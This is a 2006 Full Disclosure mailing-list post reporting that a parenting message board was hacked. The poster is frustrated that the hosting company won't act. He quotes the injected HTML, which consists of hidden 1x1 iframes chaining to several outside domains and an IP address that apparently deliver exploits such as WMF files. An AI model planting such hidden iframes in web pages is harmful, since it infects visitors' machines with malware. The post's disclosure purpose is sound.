Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Invisionzone.com board hacked...and Invision won't do a thing...
From: psmith () metafore ca
Date: Mon, 3 Apr 2006 11:38:30 -0400


What is with irresponsible hosting companies?

I called Invision to report a hack where someone planted an iframe, which
is loading some exploits (wmf files and such). They will NOT do anything
unless the account holder calls in...so lets keep letting machines get
infected.

That is very irresponsible.

The site in question is http://september2002.invisionzone.com , (which is a
board my wife visits, other mothers with children born in September 2002)

Going there, you get:

<html>
<head>
<title>iframeCASH.biz</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<body>
<iframe src="http://www.doubleh.fr/audio/index.htm"; width=1
height=1></iframe>
<b>IPB WARNING</b> [2] main(./sources/functions.php): failed to open
stream: No such file or directory (Line: 211 of /index.php)<br />
<b>IPB WARNING</b> [2] main(./sources/functions.php): failed to open
stream: No such file or directory (Line: 211 of /index.php)<br />

Of course, the index.htm at doubleh.fr , has the following content:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<iframe src="http://traffdollars.biz/dl/adv553.php"; width=1
height=1></iframe>
<iframe src="http://1-extreme.biz/traff.php?adv=35"; width=1
height=1></iframe>
<iframe src='http://traff4all.biz/adv/174/new.php&apos; width=1
height=1></iframe>
<iframe src="http://85.255.113.22/inc/nan49.html"; width=1
height=1></iframe>
</body>
</html>

I didn't go beyond this, as I am ticked off from spending the last half an
hour trying to clean up after it.

However, Invision sure should have at least taken the URL to look at it.

Are all hosting companies like this? Very stupid.

I am not sure what it was trying to do, but it affected both Firefox and
MSIE. I have installed the latest SAV (04-02-2006) definitions and it
didn't say very much.

Thanks,

Paul

---------------------------------------------------
Paul W. Smith
Senior Network Operations Engineer
MCP, SCWSE, SCSA, SCNA, ACE, 3CSA, CNS, CLS, CLA, CRA, BCCA, JNCIA-FWV
Enterprise Services
Metafore IT Solutions
Direct: 905.362.7290
Cell: 416.271.6937
Toll Free: 800.563.7515 x 4086
psmith () metafore ca
http://www.metafore.ca

M E T A F O R E
IT SOLUTIONS
----------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault